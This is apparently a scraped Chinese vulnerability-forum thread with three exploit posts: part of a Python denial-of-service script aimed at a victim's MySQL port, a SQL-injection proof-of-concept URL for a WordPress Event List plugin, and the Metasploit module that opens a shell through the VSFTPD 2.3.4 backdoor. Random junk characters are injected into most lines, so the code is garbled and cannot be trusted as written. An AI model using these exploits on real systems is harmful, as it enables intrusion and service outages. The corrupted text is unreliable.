    buf2=("x11x00x00x00x03set autocommit30")! n! ~- X8 J% y* y# n4 y* F, k

    8 ?+ y: p4 g! n1 m/ z( g6 Gdef usage():5 K4 B4 @$ a9 a' K. `6 _
    print "usage : ./mysql.py <victim_ip>"
    ( x# V' C$ z0 Oprint "example: ./mysql.py 192.168.1.22"
    ) S8 R% G( @) x   r+ u( W- H- R% ]4 t4 Y
    * b* g* B7 |/ Z* ]" G: l$ L
    def main():5 A; D* ~( i, k1 d
    if len(sys.argv) != 2:
    2 z) n& o" ~$ v4 p9 S! Q1 wusage()' ^- G; x4 m2 M; z% e1 {1 [4 g
    sys.exit()
    ! a! P* x# \+ x/ E$ ~s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    " Q8 V+ _& S% U  G3 N3 Z4 E9 I
    / O& @( d; r3 J5 UHOST = sys.argv[1]8 g1 g( k; ?3 |$ V0 [
    PORT = int(3306)
    & c- M8 C! X' T/ r' y9 r' Ls.connect((HOST,PORT))  \. j# _  }( @. q
    print "
  • Connect"# L" e: L0 S3 }
    s.send(buf)6 d7 u9 H% L9 B' s
    print "
  • Payload 1 sent"
    # u9 W9 H; n+ ]! i. ^  u% ws.send(buf2)
    6 K" Q  l' |1 E& cprint "
  • Payload 2 sent) `$ v- ^8 R1 R
    ", "
  • Run again to ensure it is down..
    1 ?. F& a, T" d0 D0 s8 W"! S2 T' D  `8 B" g" L
    s.close()
    $ d6 V# S: R, y% y: }. v7 b3 p  J% O
    : n3 N6 n/ S. v7 `if __name__ == "__main__":& r+ _) ^% x7 E4 U2 U: G! V
    main()
    5 m, V. v- v* A) M6 A0 y- K# b& I2 D# W/ g. c) J# ?' E* Y
    5 O6 f, Y3 m; i
    * [$ ]) n, ~, I) e, y* l+ r
    7 C* s. l( }. l) T+ q" H4 i2 d
    - _5 x. Y- _4 ^, D

    ; v1 d; ^8 l6 `7 s* u- G, F# o# N( f! N5 m# x

    , C$ F2 h4 j8 }' s& Y7 w  O/ [. F3 a
    ' m9 Z, o8 t$ j$ q, y

    7 ^- d6 r( n1 U$ c$ C7 m5 `7 ^  d3 @

      k4 T9 W- _; n& Q% ~- L, w2 ?' H1 Z
    8 k" o$ [3 q3 n# o& B6 x1 a" n7 f, @2 H

    $ u! x: b3 W, C" D
    2 G, K, z1 s0 r
    : ^9 n! N9 }, M( j  D公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:" C* }( Y- e8 ?# v* E
      ; J% r1 f' T, \* X# e% g
         
    " p# p  W# r" W2 E5 {( l0 ^  
    ( x1 P, \& M1 {5 X8 kSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress2 X% D. U. h7 u! I9 X; R6 a
    allows an authenticated user to execute arbitrary SQL commands via the id! k* P0 `" V& D7 m# j2 M$ G* W
    parameter to wp-admin/admin.php. 0 w; g* }, E  ]- t# X: y+ {
      ; U7 \  B5 X8 L1 s2 G7 Q
       
    & j0 N- R, q4 l5 D/ s8 [6 |2 m0 t  
    , \& E; Q+ r; t  A) `( s- I2. Proof of Concept:  O, M1 \" u% \9 d9 N
      3 D! Z2 O, w4 P6 v7 z% [7 a0 E
       " E5 k1 b) h+ q6 ~$ C& n/ k# U
      7 s) A* b+ p, H8 `
    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
    9 T9 {  `( D' E! f% ~0 o+ f0 b# e+ Q=1 AND SLEEP(10)9 T" Q( b" {" C/ F* y9 y

      L7 B0 y. Y: f1 G; D  
    , P0 c* `9 W: y$ }' h   
    8 K& T; t; r' x  I2 P  / [2 K* G5 d4 s- ^
    3. Solution:
    # e; Y$ D, \1 U$ }- s  
    9 U: T9 v$ q! l     
    ! @2 t# X$ o& Y* J  
    ( m1 ?: C+ B  N9 GThe plugin has been removed from WordPress. Deactivate the plug-in and wait
    9 {' V8 t# c- r) J/ Y/ j6 ~for a hotfix., j1 N2 C6 t& y3 k- U5 C
      
    # D- F+ }: s$ j  M; D   4 {8 U2 O5 B5 Z! O
      
    / ?# p* }/ u3 S' N3 y) P4. Reference:
    4 @. G2 a% ]; B+ o    v& s( X: ]0 j% b! l1 @
       
    % p3 F; ]% y9 f; w7 ~4 f# J0 T( I  
    5 ?; y; H( T7 u, E+ ?9 J1 @, D9 ?. ?" ]http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
    + m- `2 A( |. y+ w; P. fction-sqli/% S+ |$ k7 S4 P8 O  _3 e
      * P* _. G/ e) U7 e* C# Q! z8 {
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    * O" C6 D; W% Y$ D/ L0 P* W; D! o  J
    ( O/ F& b; t+ Y" T3 ?% D( L
    ! Q; }' d: F4 u$ @- ?0 j

      c2 W5 n% Q0 z& e! l  _3 a4 m5 F6 J7 E7 d" ~9 G" p# `7 ]
    5 z+ }, d7 T# @2 o* j& |" Y

    " N/ @) l; H4 \7 a- l4 Z9 T  y) |9 @1 U

    # Z% F0 B$ E3 J  S: Q2 K6 f& e# e# \, s1 D, \

    " b0 ~4 }( Z. Y  X7 H0 n$ j8 v4 {" A. Z3 f: H$ t* v1 Y5 T( V
    * l8 S3 H/ `6 N0 n4 X6 h  D! X

    % L  l+ G! i4 n5 u( A% H+ J9 K1 V5 \% N( J; `  g8 e$ p
    ' D, B5 o; c; I. G- A- K$ U
    + C1 ~, @) c$ u% f* U
    5 O8 I, Y; @" X! m, {8 N
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
    + u1 b) d5 _9 \4 S& @& @5 B
    ! O1 p2 B  X# g$ j5 h, T* a/ f6 s0 p# _5 [+ ^- V0 ~  Z; r! R# B! [
    ; N! \. d. @  G! i
    require msf/core
    & l+ T, w5 C  A! d8 ^. V! S8 b) {- v0 k" [% O9 d
    class Metasploit3 < Msf::Exploit::Remote# h, H; g' @5 S: x! D
    Rank = ExcellentRanking
    1 T5 S0 N/ \: t& X% C% \9 |: ]7 z. S
    include Msf::Exploit::Remote::Tcp# W" q8 e. C. r, S% _

    ( l4 I2 `4 V7 `/ ?8 y$ Qdef initialize(info = {})2 V- ~8 t! M5 B* H
    super(update_info(info
    + e; H0 Z' r% C  }Name => VSFTPD v2.3.4 Backdoor Command Execution
    9 {9 O8 N+ D, A3 e1 cDescript_ion => %q{
    1 \/ R8 T( p* e0 F2 {* vThis module exploits a malicious backdoor that was added to the VSFTPD download
    7 M8 U& w% @# I6 U, W# larchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
    3 W5 T5 x) o+ ?# ^# OJune 30th 2011 and July 1st 2011 according to the most recent information/ F2 _$ q; T3 q9 g0 Z% W
    available. This backdoor was removed on July 3rd 2011.
    ! N- m% D  R" I6 u1 l: J: e- K}
    " \; y5 h7 E# g: Y( h- cAuthor => [ hdm mc ]+ Z6 ~, U1 K7 \2 S$ y# A  v
    License => MSF_LICENSE0 |" c- H* |2 C( P
    Version => $Revision: 13099 $
    ( m* U$ M$ u# p! y% xReferences =>
    7 E- J+ V' h3 j[1 B: y) r7 V% |
    [ URL http://pastebin.com/AetT9sS5]9 B3 P& l6 f( {; q9 c
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]# _7 ^3 s7 C9 K! d+ H
    ]
    ! y! g3 G) Y5 C5 zPrivileged => true4 l+ w8 D! y9 x* s
    Platform => [ unix ]
    ' R1 r* c. Q0 p2 x; UArch => ARCH_CMD
    6 e7 p$ o& F$ `9 h3 M: v* A% w* hPayload =>- H- ^: P# {: l. b5 y  L
    {; D5 F/ u7 N* Y1 c
    Space => 2000
    3 V8 j) T6 p* G( b  HBadChars => $ ]2 j" w! O# V
    DisableNops => true* L, z4 J$ q  X" \, k2 B
    Compat =>, d5 x  h6 d/ F! I
    {
    ' [$ d! M+ f1 s5 U4 SPayloadType => cmd_interact
    0 ]1 P. {+ a! k3 r5 Z5 h  w( iConnectionType => find1 m" W2 h. e8 J. u3 i' H# x
    }' f1 o' y( C4 E8 g7 g  }. u
    }* i5 V* z  v: z6 S3 O0 q* `+ A
    Targets =>
    ; |, n3 J$ Z. i  N. y4 v/ }[
    , A2 i7 S# _$ E- r" y. j[ Automatic { } ]
    . U0 x! D6 V$ F0 J/ d]0 a6 F$ l6 x3 o  k4 E6 m
    DisclosureDate => Jul 3 20111 F* v4 |; [* _2 ~
    DefaultTarget => 0))& r: X7 d: M) T4 g0 R
    " T) U% N( E  d7 R
    register_options([ Opt::RPORT(21) ] self.class): i4 O! |& c6 n/ ~9 a
    end
    5 v6 n! j9 h4 t, `* L
    9 l" {2 W2 |. f8 N( C- D/ [2 r' B5 Pdef exploit
    0 q2 q4 R9 F6 x
    1 N5 w; N% A+ dnsock = self.connect(false {RPORT => 6200}) rescue nil& M2 H7 D1 v/ S. `; k+ U
    if nsock! c9 r0 ^9 [/ v8 N! \+ A
    print_status(The port used by the backdoor bind listener is already open), g. _0 Z; d) E: [! L
    handle_backdoor(nsock); A& ~- P" s4 l4 w4 O
    return
    5 D  f4 k4 Z: v. d3 r% j4 ^/ xend
    4 i3 Q7 B2 k& U6 Q5 M* n
    $ n+ O: X/ A6 Q( w' P, ~" d' ]# Connect to the FTP service port first
    0 A: X0 k- @, t0 t) M' u+ I/ ]connect
    1 s2 Y# F$ g6 u- W! |1 W
    - u9 ]( P$ y0 Bbanner = sock.get_once(-1 30).to_s
    ( ?0 c& X  ~" Kprint_status(Banner: #{banner.strip})
    : P9 d- N. q6 J! ]; F9 L7 J1 g1 L+ h' E4 G6 z3 f9 S# f( |
    sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
    3 O( J9 o& }# R  N/ H)
    $ j8 |4 }. R$ p1 L3 j5 T0 Jresp = sock.get_once(-1 30).to_s
    5 M" h+ T* n- B- X/ d6 J' _* qprint_status(USER: #{resp.strip})" [7 O# j: X7 B7 {

    6 B) G& O9 b( jif resp =~ /^530 // M7 X8 e; r1 p' h9 F; F
    print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
    - T- J5 c! b1 w# }disconnect2 _( |/ S- _  o% D% }
    return  z: T/ L3 y6 i& X
    end0 U9 I& Q5 e- E( N7 B7 c

    " C3 G4 ^6 o% d: D4 wif resp !~ /^331 /, Y. p4 [; p" V
    print_error(This server did not respond as expected: #{resp.strip})
    5 G8 d6 n6 B8 h7 }+ mdisconnect( n2 [" b! L0 F$ m
    return$ B& r; f6 G% Y
    end
    - o) Y/ r0 v- x; L* f% r7 S% y1 K2 e3 x% l7 [7 U4 u  M& V
    sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}! U6 p: s5 v) ^
    )
    ! f7 P4 X& R, U! i* Q
    * r" ^; R. J: y5 ^+ S+ I9 Y2 b# Do not bother reading the response from password just try the backdoor
    - }- ~* [# P# t1 k- E6 Y8 S# ?8 qnsock = self.connect(false {RPORT => 6200}) rescue nil
    & g  `8 E9 E5 c! |if nsock3 b* M4 _& Y) Z6 e4 I
    print_good(Backdoor service has been spawned handling...)  v: y& K9 T. W& g6 T% A
    handle_backdoor(nsock)7 |: m* c/ ^* C/ _5 t) S
    return
    ! V2 O$ E. _- send
    ( C( j! v  A& s. }, V3 k2 P' W0 V& j# `7 Q
    disconnect8 j7 ]0 {8 [$ r
    ; j+ n. s$ ^+ L/ o* g  S
    end
    7 F6 @% E/ P4 R6 ]7 W# @/ F$ N" h3 N  m6 b# r5 w
    def handle_backdoor(s)
    * {1 V7 _# @: A. Z$ o: x9 V* m: w7 D4 y
    s.put(id
    6 ^2 V: y+ \2 Z2 {5 S* ^. ]); J  S: W3 W2 }
    , u( j7 q+ F, t9 D, x: I* l
    r = s.get_once(-1 5).to_s9 ~8 `8 f; X; a. i, v) J. l! f
    if r !~ /uid=/
    . z  H4 @+ m4 @print_error(The service on port 6200 does not appear to be a shell)
    # v. Q$ U7 n  \/ b5 Y0 F# R/ s) fdisconnect(s)% m. |- s% W# x2 T- I
    return
    1 U& C. w. V4 z: Qend
    4 d2 f. y& J$ ?: b
    * A  E( N- {1 O2 \! fprint_good(UID: #{r.strip})# E  H/ n  |' r# s. a( v+ f

    ' o$ S: I# p; H! ks.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
    9 }8 ]1 R9 G5 M0 ohandler(s)# b8 k! _' Y% h
    end
    ! ~- B& N: m9 O5 V) @
    7 P8 T" l' {, d- Z( gend复制代码
    - C% l. V- I4 T5 e* O% C) G- b+ K
    4 B: \- v% H5 h8 U, I' V4 K# s' a6 o2 F  ~* }

    6 Z8 e' ]2 }/ B2 j3 `# U  h( h, g8 e- C5 P, @
    8 n' C( d( ?7 ]' M, R- U( O
    ! R) C1 E3 |4 g  g
    8 _2 m8 l: Y4 _# Z
    : K3 a  Z3 U- z
    . z) t2 Z$ |' X4 R, }/ i! p, k9 s) D1 J$ R
    1 j: l) g- K9 J3 }1 [0 ~5 ^6 T0 J

    : X$ i. n" o: K: A
    % ^$ h1 E- v$ N4 Z% @6 d, F5 R9 Z% S2 E

    ) v* s( A2 y% S( `7 R% ]
    . k& a& f0 }4 j& R$ W% g* q; B7 B
    8 L3 ^7 O' v" d7 q  _
    * [) x# ?& L2 l  _  _4 _/ ?, @% K9 m- X6 {' F( p8 C7 B" w  {& L* J
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表